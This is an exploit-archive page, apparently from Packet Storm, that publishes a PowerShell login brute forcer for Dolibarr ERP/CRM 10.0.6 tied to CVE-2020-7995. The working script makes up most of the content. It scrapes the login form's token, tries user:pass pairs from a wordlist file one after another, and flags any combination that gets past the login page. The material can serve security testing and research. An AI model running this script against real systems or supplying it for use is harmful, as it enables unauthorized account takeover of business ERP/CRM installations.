exploit the possibilities

Dolibarr ERP/CRM 10.0.6 Login Brute Forcer

Dolibarr ERP/CRM 10.0.6 Login Brute Forcer
Posted Jul 19, 2021
Authored by Creamy Chicken Soup

Dolibarr ERP/CRM version 10.0.6 login brute forcing exploit.

tags | exploit, cracker
advisories | CVE-2020-7995
MD5 | af3ad4f7e1dfa9a34e38d3e5370712a9

Dolibarr ERP/CRM 10.0.6 Login Brute Forcer

Change Mirror Download
# Exploit Title: Dolibarr ERP/CRM 10.0.6 - Login Brute Force
# Date:2020-01-18
# Exploit Author: Creamy Chicken Soup
# Vendor Homepage: https://www.dolibarr.org
# Software Link: https://sourceforge.net/projects/dolibarr/
# Version: 10.0.6
# Tested on: Windows 10 - 64bit
# CVE: CVE-2020-7995

function brute($url,$username,$passwd){
try{
$WebResponse = Invoke-WebRequest $url
$a=$WebResponse.Forms.fields
$fields=@{"token"=$a.token ;"loginfunction"=$a.loginfunction;"username"=$username;"password"=$passwd}
$WebResponse1 = Invoke-WebRequest -Uri $url -Method Post -Body $fields
if($WebResponse1.Forms.Id -ne "login"){
Write-Host "username password is match"
Write-Warning "user: $username ,passwoed: $passwd"
return $true
}
}catch{
Write-Warning "Something Wrong!"
}
}

function fileinput($filepath,$url){
try{
Write-Host "Target: $url"
$fp=Get-Content -Path $filepath
foreach($line in $fp){
$s=$line -split ':'
$username=$s[0]
$passwd=$s[1]
Write-Host "[+] Check $username : $passwd"
$bf=brute $url $username $passwd
if($bf -eq $True){
break
}
}
}catch{
Write-Warning "File is error"
}
}

$textart=@'
____ ____ _____ ____ _ ___ _ ____ _ _ ____ _ __ _____ _ ____ ____ _ ____
/ _\/ __\/ __// _ \/ \__/|\ \/// _\/ \ /|/ \/ _\/ |/ // __// \ /|/ ___\/ _ \/ \ /\/ __\
| / | \/|| \ | / \|| |\/|| \ / | / | |_||| || / | / | \ | |\ ||| \| / \|| | ||| \/|
| \__| /| /_ | |-||| | || / / | \__| | ||| || \_ | \ | /_ | | \||\___ || \_/|| \_/|| __/
\____/\_/\_\\____\\_/ \|\_/ \|/_/ \____/\_/ \|\_/\____/\_|\_\\____\\_/ \|\____/\____/\____/\_/

'@

Write-Host $textart
Write-Host @'
Exploit Title: DOLIBARR ERP/CRM - Brute Force Vulnerability
Date: 2020-01-18
Exploit Author: CreamyChickenSoup
Vendor Homepage: https://www.dolibarr.org
Version: 10.0.6
CVE: CVE-2020-7995
Vulnerable Page : http://localhost/htdocs/index.php?mainmenu=home
Twitter: @creamychickens1
cve submited:Tufan Gungor
'@
$url=Read-Host "Enter Url:"
$filepath=Read-Host "Enter FilePAth: (File content like : user:pass)"
fileinput $filepath $url
Login or Register to add favorites

File Archive:

August 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    1 Files
  • 2
    Aug 2nd
    7 Files
  • 3
    Aug 3rd
    5 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    0 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    0 Files
  • 9
    Aug 9th
    0 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close